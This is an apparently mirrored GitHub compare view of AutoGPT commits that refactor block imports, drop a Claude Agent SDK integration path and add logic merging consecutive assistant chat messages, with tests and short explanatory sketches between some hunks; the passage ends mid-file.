mirror of https://github.com/Significant-Gravitas/AutoGPT.git
synced 2026-02-12 07:45:14 -05:00

Compare commits: feat/copit ... fix/copilo (6 commits)
| Author | SHA1 | Date |
|---|---|---|
| | 5348d97437 | |
| | 113e87a23c | |
| | d09f1532a4 | |
| | a78145505b | |
| | 6573d987ea | |
| | ae8ce8b4ca | |
@@ -62,16 +62,12 @@ ENV POETRY_HOME=/opt/poetry \
     DEBIAN_FRONTEND=noninteractive
 ENV PATH=/opt/poetry/bin:$PATH
 
-# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
-# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
+# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
 RUN apt-get update && apt-get install -y \
     python3.13 \
     python3-pip \
     ffmpeg \
     imagemagick \
-    jq \
-    ripgrep \
-    tree \
     && rm -rf /var/lib/apt/lists/*
 
 # Copy only necessary files from builder
@@ -10,7 +10,7 @@ from typing_extensions import TypedDict
 
 import backend.api.features.store.cache as store_cache
 import backend.api.features.store.model as store_model
-import backend.data.block
+import backend.blocks
 from backend.api.external.middleware import require_permission
 from backend.data import execution as execution_db
 from backend.data import graph as graph_db
@@ -67,7 +67,7 @@ async def get_user_info(
     dependencies=[Security(require_permission(APIKeyPermission.READ_BLOCK))],
 )
 async def get_graph_blocks() -> Sequence[dict[Any, Any]]:
-    blocks = [block() for block in backend.data.block.get_blocks().values()]
+    blocks = [block() for block in backend.blocks.get_blocks().values()]
     return [b.to_dict() for b in blocks if not b.disabled]
 
 
@@ -83,7 +83,7 @@ async def execute_graph_block(
         require_permission(APIKeyPermission.EXECUTE_BLOCK)
     ),
 ) -> CompletedBlockOutput:
-    obj = backend.data.block.get_block(block_id)
+    obj = backend.blocks.get_block(block_id)
     if not obj:
         raise HTTPException(status_code=404, detail=f"Block #{block_id} not found.")
     if obj.disabled:
@@ -10,10 +10,15 @@ import backend.api.features.library.db as library_db
 import backend.api.features.library.model as library_model
 import backend.api.features.store.db as store_db
 import backend.api.features.store.model as store_model
-import backend.data.block
 from backend.blocks import load_all_blocks
+from backend.blocks._base import (
+    AnyBlockSchema,
+    BlockCategory,
+    BlockInfo,
+    BlockSchema,
+    BlockType,
+)
 from backend.blocks.llm import LlmModel
-from backend.data.block import AnyBlockSchema, BlockCategory, BlockInfo, BlockSchema
 from backend.data.db import query_raw_with_schema
 from backend.integrations.providers import ProviderName
 from backend.util.cache import cached
@@ -22,7 +27,7 @@ from backend.util.models import Pagination
 from .model import (
     BlockCategoryResponse,
     BlockResponse,
-    BlockType,
+    BlockTypeFilter,
     CountResponse,
     FilterType,
     Provider,
@@ -88,7 +93,7 @@ def get_block_categories(category_blocks: int = 3) -> list[BlockCategoryResponse
 def get_blocks(
     *,
     category: str | None = None,
-    type: BlockType | None = None,
+    type: BlockTypeFilter | None = None,
     provider: ProviderName | None = None,
     page: int = 1,
     page_size: int = 50,
@@ -669,9 +674,9 @@ async def get_suggested_blocks(count: int = 5) -> list[BlockInfo]:
     for block_type in load_all_blocks().values():
         block: AnyBlockSchema = block_type()
         if block.disabled or block.block_type in (
-            backend.data.block.BlockType.INPUT,
-            backend.data.block.BlockType.OUTPUT,
-            backend.data.block.BlockType.AGENT,
+            BlockType.INPUT,
+            BlockType.OUTPUT,
+            BlockType.AGENT,
         ):
             continue
         # Find the execution count for this block
@@ -4,7 +4,7 @@ from pydantic import BaseModel
 
 import backend.api.features.library.model as library_model
 import backend.api.features.store.model as store_model
-from backend.data.block import BlockInfo
+from backend.blocks._base import BlockInfo
 from backend.integrations.providers import ProviderName
 from backend.util.models import Pagination
 
@@ -15,7 +15,7 @@ FilterType = Literal[
     "my_agents",
 ]
 
-BlockType = Literal["all", "input", "action", "output"]
+BlockTypeFilter = Literal["all", "input", "action", "output"]
 
 
 class SearchEntry(BaseModel):
@@ -88,7 +88,7 @@ async def get_block_categories(
 )
 async def get_blocks(
     category: Annotated[str | None, fastapi.Query()] = None,
-    type: Annotated[builder_model.BlockType | None, fastapi.Query()] = None,
+    type: Annotated[builder_model.BlockTypeFilter | None, fastapi.Query()] = None,
     provider: Annotated[ProviderName | None, fastapi.Query()] = None,
     page: Annotated[int, fastapi.Query()] = 1,
     page_size: Annotated[int, fastapi.Query()] = 50,
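A note on the rename above: `BlockType` was serving as both the query-filter literal and the runtime block-type enum, and the new import from `backend.blocks._base` would have collided with it. A minimal sketch with illustrative stand-ins (not the project's real classes) of how the two names coexist after the rename:

```python
from enum import Enum
from typing import Literal

# The API-facing filter stays a plain literal, as in the diff...
BlockTypeFilter = Literal["all", "input", "action", "output"]

# ...while BlockType (really imported from backend.blocks._base) is the
# runtime enum used to classify blocks. An illustrative stand-in:
class BlockType(Enum):
    INPUT = "input"
    OUTPUT = "output"
    AGENT = "agent"

def filter_matches(filter_: BlockTypeFilter, block_type: BlockType) -> bool:
    # "all" matches everything; otherwise compare the literal to the enum value
    return filter_ == "all" or filter_ == block_type.value
```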
@@ -27,11 +27,12 @@ class ChatConfig(BaseSettings):
     session_ttl: int = Field(default=43200, description="Session TTL in seconds")
 
     # Streaming Configuration
-    stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
-    max_retries: int = Field(
-        default=3,
-        description="Max retries for fallback path (SDK handles retries internally)",
+    max_context_messages: int = Field(
+        default=50, ge=1, le=200, description="Maximum context messages"
     )
 
+    stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
+    max_retries: int = Field(default=3, description="Maximum number of retries")
     max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
     max_agent_schedules: int = Field(
         default=30, description="Maximum number of agent schedules"
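For reference, a minimal sketch of the bounded-field pattern used for the new `max_context_messages`, assuming pydantic v2 / pydantic-settings semantics; `DemoConfig` is a hypothetical stand-in for `ChatConfig`:

```python
from pydantic import Field, ValidationError
from pydantic_settings import BaseSettings

class DemoConfig(BaseSettings):
    # Same shape as the new field: bounded integer with a default
    max_context_messages: int = Field(
        default=50, ge=1, le=200, description="Maximum context messages"
    )

print(DemoConfig().max_context_messages)  # -> 50
try:
    DemoConfig(max_context_messages=500)  # rejected: exceeds le=200
except ValidationError as exc:
    print(exc.error_count(), "validation error")
```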
@@ -92,17 +93,6 @@ class ChatConfig(BaseSettings):
         description="Name of the prompt in Langfuse to fetch",
     )
 
-    # Claude Agent SDK Configuration
-    use_claude_agent_sdk: bool = Field(
-        default=True,
-        description="Use Claude Agent SDK for chat completions",
-    )
-    sdk_max_buffer_size: int = Field(
-        default=10 * 1024 * 1024,  # 10MB (default SDK is 1MB)
-        description="Max buffer size in bytes for SDK JSON message parsing. "
-        "Increase if tool outputs exceed the limit.",
-    )
-
     # Extended thinking configuration for Claude models
     thinking_enabled: bool = Field(
         default=True,
@@ -148,17 +138,6 @@ class ChatConfig(BaseSettings):
         v = os.getenv("CHAT_INTERNAL_API_KEY")
         return v
 
-    @field_validator("use_claude_agent_sdk", mode="before")
-    @classmethod
-    def get_use_claude_agent_sdk(cls, v):
-        """Get use_claude_agent_sdk from environment if not provided."""
-        # Check environment variable - default to True if not set
-        env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
-        if env_val:
-            return env_val in ("true", "1", "yes", "on")
-        # Default to True (SDK enabled by default)
-        return True if v is None else v
-
 # Prompt paths for different contexts
 PROMPT_PATHS: dict[str, str] = {
     "default": "prompts/chat_system.md",
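The removed validator's env-parsing idiom, restated as a standalone sketch (the helper name is hypothetical; the original was a `field_validator` on `ChatConfig`):

```python
import os

def env_flag(name: str, default: bool = True) -> bool:
    # Mirrors the removed validator: any of these strings enables the flag,
    # while an unset or empty variable falls back to the default
    val = os.getenv(name, "").lower()
    if val:
        return val in ("true", "1", "yes", "on")
    return default

# e.g. env_flag("CHAT_USE_CLAUDE_AGENT_SDK") -> True unless explicitly disabled
```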
@@ -2,7 +2,7 @@ import asyncio
 import logging
 import uuid
 from datetime import UTC, datetime
-from typing import Any
+from typing import Any, cast
 from weakref import WeakValueDictionary
 
 from openai.types.chat import (
@@ -104,6 +104,26 @@ class ChatSession(BaseModel):
     successful_agent_runs: dict[str, int] = {}
     successful_agent_schedules: dict[str, int] = {}
 
+    def add_tool_call_to_current_turn(self, tool_call: dict) -> None:
+        """Attach a tool_call to the current turn's assistant message.
+
+        Searches backwards for the most recent assistant message (stopping at
+        any user message boundary). If found, appends the tool_call to it.
+        Otherwise creates a new assistant message with the tool_call.
+        """
+        for msg in reversed(self.messages):
+            if msg.role == "user":
+                break
+            if msg.role == "assistant":
+                if not msg.tool_calls:
+                    msg.tool_calls = []
+                msg.tool_calls.append(tool_call)
+                return
+
+        self.messages.append(
+            ChatMessage(role="assistant", content="", tool_calls=[tool_call])
+        )
+
     @staticmethod
     def new(user_id: str) -> "ChatSession":
         return ChatSession(
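The backwards scan in `add_tool_call_to_current_turn` is easy to restate in isolation. A minimal sketch with plain dicts instead of the project's `ChatMessage` model (illustrative only):

```python
def attach_to_current_turn(messages: list[dict], tool_call: dict) -> None:
    for msg in reversed(messages):
        if msg["role"] == "user":
            break  # crossed into the previous turn; stop searching
        if msg["role"] == "assistant":
            msg.setdefault("tool_calls", []).append(tool_call)
            return
    # No assistant message in the current turn yet: start one
    messages.append({"role": "assistant", "content": "", "tool_calls": [tool_call]})

history = [{"role": "user", "content": "hi"},
           {"role": "assistant", "content": "working on it"}]
attach_to_current_turn(history, {"id": "tc1", "type": "function",
                                 "function": {"name": "f", "arguments": "{}"}})
assert history[1]["tool_calls"][0]["id"] == "tc1"  # attached in place
```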
@@ -172,6 +192,47 @@ class ChatSession(BaseModel):
             successful_agent_schedules=successful_agent_schedules,
         )
 
+    @staticmethod
+    def _merge_consecutive_assistant_messages(
+        messages: list[ChatCompletionMessageParam],
+    ) -> list[ChatCompletionMessageParam]:
+        """Merge consecutive assistant messages into single messages.
+
+        Long-running tool flows can create split assistant messages: one with
+        text content and another with tool_calls. Anthropic's API requires
+        tool_result blocks to reference a tool_use in the immediately preceding
+        assistant message, so these splits cause 400 errors via OpenRouter.
+        """
+        if len(messages) < 2:
+            return messages
+
+        result: list[ChatCompletionMessageParam] = [messages[0]]
+        for msg in messages[1:]:
+            prev = result[-1]
+            if prev.get("role") != "assistant" or msg.get("role") != "assistant":
+                result.append(msg)
+                continue
+
+            prev = cast(ChatCompletionAssistantMessageParam, prev)
+            curr = cast(ChatCompletionAssistantMessageParam, msg)
+
+            curr_content = curr.get("content") or ""
+            if curr_content:
+                prev_content = prev.get("content") or ""
+                prev["content"] = (
+                    f"{prev_content}\n{curr_content}" if prev_content else curr_content
+                )
+
+            curr_tool_calls = curr.get("tool_calls")
+            if curr_tool_calls:
+                prev_tool_calls = prev.get("tool_calls")
+                prev["tool_calls"] = (
+                    list(prev_tool_calls) + list(curr_tool_calls)
+                    if prev_tool_calls
+                    else list(curr_tool_calls)
+                )
+        return result
+
     def to_openai_messages(self) -> list[ChatCompletionMessageParam]:
         messages = []
         for message in self.messages:
@@ -258,7 +319,7 @@ class ChatSession(BaseModel):
                     name=message.name or "",
                 )
             )
-        return messages
+        return self._merge_consecutive_assistant_messages(messages)
 
 
 async def _get_session_from_cache(session_id: str) -> ChatSession | None:
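What the merge buys, as a before/after worked example with plain dicts (illustrative data, not from the diff):

```python
# Before: the assistant turn is split, so the tool result does not follow
# the assistant message that carries its tool_use.
split = [
    {"role": "user", "content": "build agent"},
    {"role": "assistant", "content": "Let me build that"},                # text only
    {"role": "assistant", "content": "", "tool_calls": [{"id": "tc1"}]},  # tool_calls only
    {"role": "tool", "tool_call_id": "tc1", "content": "ok"},
]

# After merging, the tool result's tool_use sits in the immediately
# preceding assistant message, which is what Anthropic requires.
merged = [
    {"role": "user", "content": "build agent"},
    {"role": "assistant", "content": "Let me build that",
     "tool_calls": [{"id": "tc1"}]},
    {"role": "tool", "tool_call_id": "tc1", "content": "ok"},
]
```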
@@ -273,8 +334,9 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
     try:
         session = ChatSession.model_validate_json(raw_session)
         logger.info(
-            f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
-            f"last_roles={[m.role for m in session.messages[-3:]]}"  # Last 3 roles
+            f"Loading session {session_id} from cache: "
+            f"message_count={len(session.messages)}, "
+            f"roles={[m.role for m in session.messages]}"
         )
         return session
     except Exception as e:
@@ -316,9 +378,11 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
         return None
 
     messages = prisma_session.Messages
-    logger.debug(
-        f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
-        f"roles={[m.role for m in messages[-3:]] if messages else []}"  # Last 3 roles
+    logger.info(
+        f"Loading session {session_id} from DB: "
+        f"has_messages={messages is not None}, "
+        f"message_count={len(messages) if messages else 0}, "
+        f"roles={[m.role for m in messages] if messages else []}"
     )
 
     return ChatSession.from_db(prisma_session, messages)
@@ -369,9 +433,10 @@ async def _save_session_to_db(
                 "function_call": msg.function_call,
             }
         )
-    logger.debug(
-        f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
-        f"roles={[m['role'] for m in messages_data]}"
+    logger.info(
+        f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
+        f"roles={[m['role'] for m in messages_data]}, "
+        f"start_sequence={existing_message_count}"
     )
     await chat_db.add_chat_messages_batch(
         session_id=session.session_id,
@@ -411,7 +476,7 @@ async def get_chat_session(
     logger.warning(f"Unexpected cache error for session {session_id}: {e}")
 
     # Fall back to database
-    logger.debug(f"Session {session_id} not in cache, checking database")
+    logger.info(f"Session {session_id} not in cache, checking database")
     session = await _get_session_from_db(session_id)
 
     if session is None:
@@ -428,6 +493,7 @@ async def get_chat_session(
     # Cache the session from DB
     try:
         await _cache_session(session)
+        logger.info(f"Cached session {session_id} from database")
     except Exception as e:
         logger.warning(f"Failed to cache session {session_id}: {e}")
 
@@ -492,40 +558,6 @@ async def upsert_chat_session(
     return session
 
 
-async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
-    """Atomically append a message to a session and persist it.
-
-    Acquires the session lock, re-fetches the latest session state,
-    appends the message, and saves — preventing message loss when
-    concurrent requests modify the same session.
-    """
-    lock = await _get_session_lock(session_id)
-
-    async with lock:
-        session = await get_chat_session(session_id)
-        if session is None:
-            raise ValueError(f"Session {session_id} not found")
-
-        session.messages.append(message)
-        existing_message_count = await chat_db.get_chat_session_message_count(
-            session_id
-        )
-
-        try:
-            await _save_session_to_db(session, existing_message_count)
-        except Exception as e:
-            raise DatabaseError(
-                f"Failed to persist message to session {session_id}"
-            ) from e
-
-        try:
-            await _cache_session(session)
-        except Exception as e:
-            logger.warning(f"Cache write failed for session {session_id}: {e}")
-
-        return session
-
-
 async def create_chat_session(user_id: str) -> ChatSession:
     """Create a new chat session and persist it.
 
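For context, the removed helper implemented a per-session lock-then-refetch write. A generic sketch of that pattern, with an in-memory store standing in for the cache and database (all names illustrative):

```python
import asyncio

_locks: dict[str, asyncio.Lock] = {}

def _get_lock(key: str) -> asyncio.Lock:
    # One lock per session id, created on first use
    return _locks.setdefault(key, asyncio.Lock())

async def append_atomically(store: dict, session_id: str, message: dict) -> dict:
    async with _get_lock(session_id):
        session = store[session_id]          # re-fetch latest state under the lock
        session["messages"].append(message)  # mutate
        store[session_id] = session          # persist before releasing the lock
        return session
```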
@@ -632,19 +664,13 @@ async def update_session_title(session_id: str, title: str) -> bool:
         logger.warning(f"Session {session_id} not found for title update")
         return False
 
-        # Update title in cache if it exists (instead of invalidating).
-        # This prevents race conditions where cache invalidation causes
-        # the frontend to see stale DB data while streaming is still in progress.
+        # Invalidate cache so next fetch gets updated title
         try:
-            cached = await _get_session_from_cache(session_id)
-            if cached:
-                cached.title = title
-                await _cache_session(cached)
+            redis_key = _get_session_cache_key(session_id)
+            async_redis = await get_redis_async()
+            await async_redis.delete(redis_key)
         except Exception as e:
-            # Not critical - title will be correct on next full cache refresh
-            logger.warning(
-                f"Failed to update title in cache for session {session_id}: {e}"
-            )
+            logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
 
         return True
     except Exception as e:
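The two cache strategies this hunk trades between, sketched against a generic async Redis-style client (function names here are illustrative, not the project's API):

```python
async def invalidate(redis, key: str) -> None:
    # fix side: drop the cached entry; the next read repopulates from the DB
    await redis.delete(key)

async def write_through(redis, key: str, session_json: str) -> None:
    # feat side: update the cached value in place so readers never observe
    # stale DB state while a stream is still writing
    await redis.set(key, session_json)
```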
@@ -1,4 +1,16 @@
+from typing import cast
+
 import pytest
+from openai.types.chat import (
+    ChatCompletionAssistantMessageParam,
+    ChatCompletionMessageParam,
+    ChatCompletionToolMessageParam,
+    ChatCompletionUserMessageParam,
+)
+from openai.types.chat.chat_completion_message_tool_call_param import (
+    ChatCompletionMessageToolCallParam,
+    Function,
+)
+
 from .model import (
     ChatMessage,
@@ -117,3 +129,205 @@ async def test_chatsession_db_storage(setup_test_user, test_user_id):
             loaded.tool_calls is not None
         ), f"Tool calls missing for {orig.role} message"
         assert len(orig.tool_calls) == len(loaded.tool_calls)
+
+
+# --------------------------------------------------------------------------- #
+#                   _merge_consecutive_assistant_messages                      #
+# --------------------------------------------------------------------------- #
+
+_tc = ChatCompletionMessageToolCallParam(
+    id="tc1", type="function", function=Function(name="do_stuff", arguments="{}")
+)
+_tc2 = ChatCompletionMessageToolCallParam(
+    id="tc2", type="function", function=Function(name="other", arguments="{}")
+)
+
+
+def test_merge_noop_when_no_consecutive_assistants():
+    """Messages without consecutive assistants are returned unchanged."""
+    msgs = [
+        ChatCompletionUserMessageParam(role="user", content="hi"),
+        ChatCompletionAssistantMessageParam(role="assistant", content="hello"),
+        ChatCompletionUserMessageParam(role="user", content="bye"),
+    ]
+    merged = ChatSession._merge_consecutive_assistant_messages(msgs)
+    assert len(merged) == 3
+    assert [m["role"] for m in merged] == ["user", "assistant", "user"]
+
+
+def test_merge_splits_text_and_tool_calls():
+    """The exact bug scenario: text-only assistant followed by tool_calls-only assistant."""
+    msgs = [
+        ChatCompletionUserMessageParam(role="user", content="build agent"),
+        ChatCompletionAssistantMessageParam(
+            role="assistant", content="Let me build that"
+        ),
+        ChatCompletionAssistantMessageParam(
+            role="assistant", content="", tool_calls=[_tc]
+        ),
+        ChatCompletionToolMessageParam(role="tool", content="ok", tool_call_id="tc1"),
+    ]
+    merged = ChatSession._merge_consecutive_assistant_messages(msgs)
+
+    assert len(merged) == 3
+    assert merged[0]["role"] == "user"
+    assert merged[2]["role"] == "tool"
+    a = cast(ChatCompletionAssistantMessageParam, merged[1])
+    assert a["role"] == "assistant"
+    assert a.get("content") == "Let me build that"
+    assert a.get("tool_calls") == [_tc]
+
+
+def test_merge_combines_tool_calls_from_both():
+    """Both consecutive assistants have tool_calls — they get merged."""
+    msgs: list[ChatCompletionAssistantMessageParam] = [
+        ChatCompletionAssistantMessageParam(
+            role="assistant", content="text", tool_calls=[_tc]
+        ),
+        ChatCompletionAssistantMessageParam(
+            role="assistant", content="", tool_calls=[_tc2]
+        ),
+    ]
+    merged = ChatSession._merge_consecutive_assistant_messages(msgs)  # type: ignore[arg-type]
+
+    assert len(merged) == 1
+    a = cast(ChatCompletionAssistantMessageParam, merged[0])
+    assert a.get("tool_calls") == [_tc, _tc2]
+    assert a.get("content") == "text"
+
+
+def test_merge_three_consecutive_assistants():
+    """Three consecutive assistants collapse into one."""
+    msgs: list[ChatCompletionAssistantMessageParam] = [
+        ChatCompletionAssistantMessageParam(role="assistant", content="a"),
+        ChatCompletionAssistantMessageParam(role="assistant", content="b"),
+        ChatCompletionAssistantMessageParam(
+            role="assistant", content="", tool_calls=[_tc]
+        ),
+    ]
+    merged = ChatSession._merge_consecutive_assistant_messages(msgs)  # type: ignore[arg-type]
+
+    assert len(merged) == 1
+    a = cast(ChatCompletionAssistantMessageParam, merged[0])
+    assert a.get("content") == "a\nb"
+    assert a.get("tool_calls") == [_tc]
+
+
+def test_merge_empty_and_single_message():
+    """Edge cases: empty list and single message."""
+    assert ChatSession._merge_consecutive_assistant_messages([]) == []
+
+    single: list[ChatCompletionMessageParam] = [
+        ChatCompletionUserMessageParam(role="user", content="hi")
+    ]
+    assert ChatSession._merge_consecutive_assistant_messages(single) == single
+
+
+# --------------------------------------------------------------------------- #
+#                        add_tool_call_to_current_turn                         #
+# --------------------------------------------------------------------------- #
+
+_raw_tc = {
+    "id": "tc1",
+    "type": "function",
+    "function": {"name": "f", "arguments": "{}"},
+}
+_raw_tc2 = {
+    "id": "tc2",
+    "type": "function",
+    "function": {"name": "g", "arguments": "{}"},
+}
+
+
+def test_add_tool_call_appends_to_existing_assistant():
+    """When the last assistant is from the current turn, tool_call is added to it."""
+    session = ChatSession.new(user_id="u")
+    session.messages = [
+        ChatMessage(role="user", content="hi"),
+        ChatMessage(role="assistant", content="working on it"),
+    ]
+    session.add_tool_call_to_current_turn(_raw_tc)
+
+    assert len(session.messages) == 2  # no new message created
+    assert session.messages[1].tool_calls == [_raw_tc]
+
+
+def test_add_tool_call_creates_assistant_when_none_exists():
+    """When there's no current-turn assistant, a new one is created."""
+    session = ChatSession.new(user_id="u")
+    session.messages = [
+        ChatMessage(role="user", content="hi"),
+    ]
+    session.add_tool_call_to_current_turn(_raw_tc)
+
+    assert len(session.messages) == 2
+    assert session.messages[1].role == "assistant"
+    assert session.messages[1].tool_calls == [_raw_tc]
+
+
+def test_add_tool_call_does_not_cross_user_boundary():
+    """A user message acts as a boundary — previous assistant is not modified."""
+    session = ChatSession.new(user_id="u")
+    session.messages = [
+        ChatMessage(role="assistant", content="old turn"),
+        ChatMessage(role="user", content="new message"),
+    ]
+    session.add_tool_call_to_current_turn(_raw_tc)
+
+    assert len(session.messages) == 3  # new assistant was created
+    assert session.messages[0].tool_calls is None  # old assistant untouched
+    assert session.messages[2].role == "assistant"
+    assert session.messages[2].tool_calls == [_raw_tc]
+
+
+def test_add_tool_call_multiple_times():
+    """Multiple long-running tool calls accumulate on the same assistant."""
+    session = ChatSession.new(user_id="u")
+    session.messages = [
+        ChatMessage(role="user", content="hi"),
+        ChatMessage(role="assistant", content="doing stuff"),
+    ]
+    session.add_tool_call_to_current_turn(_raw_tc)
+    # Simulate a pending tool result in between (like _yield_tool_call does)
+    session.messages.append(
+        ChatMessage(role="tool", content="pending", tool_call_id="tc1")
+    )
+    session.add_tool_call_to_current_turn(_raw_tc2)
+
+    assert len(session.messages) == 3  # user, assistant, tool — no extra assistant
+    assert session.messages[1].tool_calls == [_raw_tc, _raw_tc2]
+
+
+def test_to_openai_messages_merges_split_assistants():
+    """End-to-end: session with split assistants produces valid OpenAI messages."""
+    session = ChatSession.new(user_id="u")
+    session.messages = [
+        ChatMessage(role="user", content="build agent"),
+        ChatMessage(role="assistant", content="Let me build that"),
+        ChatMessage(
+            role="assistant",
+            content="",
+            tool_calls=[
+                {
+                    "id": "tc1",
+                    "type": "function",
+                    "function": {"name": "create_agent", "arguments": "{}"},
+                }
+            ],
+        ),
+        ChatMessage(role="tool", content="done", tool_call_id="tc1"),
+        ChatMessage(role="assistant", content="Saved!"),
+        ChatMessage(role="user", content="show me an example run"),
+    ]
+    openai_msgs = session.to_openai_messages()
+
+    # The two consecutive assistants at index 1,2 should be merged
+    roles = [m["role"] for m in openai_msgs]
+    assert roles == ["user", "assistant", "tool", "assistant", "user"]
+
+    # The merged assistant should have both content and tool_calls
+    merged = cast(ChatCompletionAssistantMessageParam, openai_msgs[1])
+    assert merged.get("content") == "Let me build that"
+    tc_list = merged.get("tool_calls")
+    assert tc_list is not None and len(list(tc_list)) == 1
+    assert list(tc_list)[0]["id"] == "tc1"
@@ -1,6 +1,5 @@
 """Chat API routes for chat session management and streaming via SSE."""
 
-import asyncio
 import logging
 import uuid as uuid_module
 from collections.abc import AsyncGenerator
@@ -17,16 +16,8 @@ from . import service as chat_service
 from . import stream_registry
 from .completion_handler import process_operation_failure, process_operation_success
 from .config import ChatConfig
-from .model import (
-    ChatMessage,
-    ChatSession,
-    append_and_save_message,
-    create_chat_session,
-    get_chat_session,
-    get_user_sessions,
-)
-from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
-from .sdk import service as sdk_service
+from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
+from .response_model import StreamFinish, StreamHeartbeat
 from .tools.models import (
     AgentDetailsResponse,
     AgentOutputResponse,
@@ -49,7 +40,6 @@ from .tools.models import (
     SetupRequirementsResponse,
     UnderstandingUpdatedResponse,
 )
-from .tracking import track_user_message
 
 config = ChatConfig()
 
@@ -241,10 +231,6 @@ async def get_session(
     active_task, last_message_id = await stream_registry.get_active_task_for_session(
         session_id, user_id
     )
-    logger.info(
-        f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
-        f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
-    )
     if active_task:
         # Filter out the in-progress assistant message from the session response.
         # The client will receive the complete assistant response through the SSE
@@ -314,9 +300,10 @@ async def stream_chat_post(
         f"user={user_id}, message_len={len(request.message)}",
         extra={"json_fields": log_meta},
     )
 
     session = await _validate_and_get_session(session_id, user_id)
     logger.info(
-        f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
+        f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
         extra={
             "json_fields": {
                 **log_meta,
@@ -325,25 +312,6 @@ async def stream_chat_post(
         },
     )
 
-    # Atomically append user message to session BEFORE creating task to avoid
-    # race condition where GET_SESSION sees task as "running" but message isn't
-    # saved yet. append_and_save_message re-fetches inside a lock to prevent
-    # message loss from concurrent requests.
-    if request.message:
-        message = ChatMessage(
-            role="user" if request.is_user_message else "assistant",
-            content=request.message,
-        )
-        if request.is_user_message:
-            track_user_message(
-                user_id=user_id,
-                session_id=session_id,
-                message_length=len(request.message),
-            )
-        logger.info(f"[STREAM] Saving user message to session {session_id}")
-        session = await append_and_save_message(session_id, message)
-        logger.info(f"[STREAM] User message saved for session {session_id}")
-
     # Create a task in the stream registry for reconnection support
     task_id = str(uuid_module.uuid4())
     operation_id = str(uuid_module.uuid4())
@@ -359,7 +327,7 @@ async def stream_chat_post(
         operation_id=operation_id,
     )
     logger.info(
-        f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
+        f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
         extra={
             "json_fields": {
                 **log_meta,
@@ -380,43 +348,15 @@ async def stream_chat_post(
         first_chunk_time, ttfc = None, None
         chunk_count = 0
         try:
-            # Emit a start event with task_id for reconnection
-            start_chunk = StreamStart(messageId=task_id, taskId=task_id)
-            await stream_registry.publish_chunk(task_id, start_chunk)
-            logger.info(
-                f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
-                extra={
-                    "json_fields": {
-                        **log_meta,
-                        "elapsed_ms": (time_module.perf_counter() - gen_start_time)
-                        * 1000,
-                    }
-                },
-            )
-
-            # Choose service based on configuration
-            use_sdk = config.use_claude_agent_sdk
-            stream_fn = (
-                sdk_service.stream_chat_completion_sdk
-                if use_sdk
-                else chat_service.stream_chat_completion
-            )
-            logger.info(
-                f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
-                extra={"json_fields": log_meta},
-            )
-            # Pass message=None since we already added it to the session above
-            async for chunk in stream_fn(
+            async for chunk in chat_service.stream_chat_completion(
                 session_id,
-                None,  # Message already in session
+                request.message,
                 is_user_message=request.is_user_message,
                 user_id=user_id,
-                session=session,  # Pass session with message already added
+                session=session,  # Pass pre-fetched session to avoid double-fetch
                 context=request.context,
+                _task_id=task_id,  # Pass task_id so service emits start with taskId for reconnection
             ):
-                # Skip duplicate StreamStart — we already published one above
-                if isinstance(chunk, StreamStart):
-                    continue
                 chunk_count += 1
                 if first_chunk_time is None:
                     first_chunk_time = time_module.perf_counter()
@@ -437,7 +377,7 @@ async def stream_chat_post(
         gen_end_time = time_module.perf_counter()
         total_time = (gen_end_time - gen_start_time) * 1000
         logger.info(
-            f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
+            f"[TIMING] run_ai_generation FINISHED in {total_time/1000:.1f}s; "
             f"task={task_id}, session={session_id}, "
             f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
             extra={
@@ -464,17 +404,6 @@ async def stream_chat_post(
                     }
                 },
             )
-            # Publish a StreamError so the frontend can display an error message
-            try:
-                await stream_registry.publish_chunk(
-                    task_id,
-                    StreamError(
-                        errorText="An error occurred. Please try again.",
-                        code="stream_error",
-                    ),
-                )
-            except Exception:
-                pass  # Best-effort; mark_task_completed will publish StreamFinish
             await stream_registry.mark_task_completed(task_id, "failed")
 
     # Start the AI generation in a background task
@@ -577,14 +506,8 @@ async def stream_chat_post(
                     "json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
                 },
             )
-            # Surface error to frontend so it doesn't appear stuck
-            yield StreamError(
-                errorText="An error occurred. Please try again.",
-                code="stream_error",
-            ).to_sse()
-            yield StreamFinish().to_sse()
         finally:
-            # Unsubscribe when client disconnects or stream ends
+            # Unsubscribe when client disconnects or stream ends to prevent resource leak
             if subscriber_queue is not None:
                 try:
                     await stream_registry.unsubscribe_from_task(
@@ -828,6 +751,8 @@ async def stream_task(
     )
 
     async def event_generator() -> AsyncGenerator[str, None]:
+        import asyncio
+
         heartbeat_interval = 15.0  # Send heartbeat every 15 seconds
         try:
             while True:
@@ -1,14 +0,0 @@
-"""Claude Agent SDK integration for CoPilot.
-
-This module provides the integration layer between the Claude Agent SDK
-and the existing CoPilot tool system, enabling drop-in replacement of
-the current LLM orchestration with the battle-tested Claude Agent SDK.
-"""
-
-from .service import stream_chat_completion_sdk
-from .tool_adapter import create_copilot_mcp_server
-
-__all__ = [
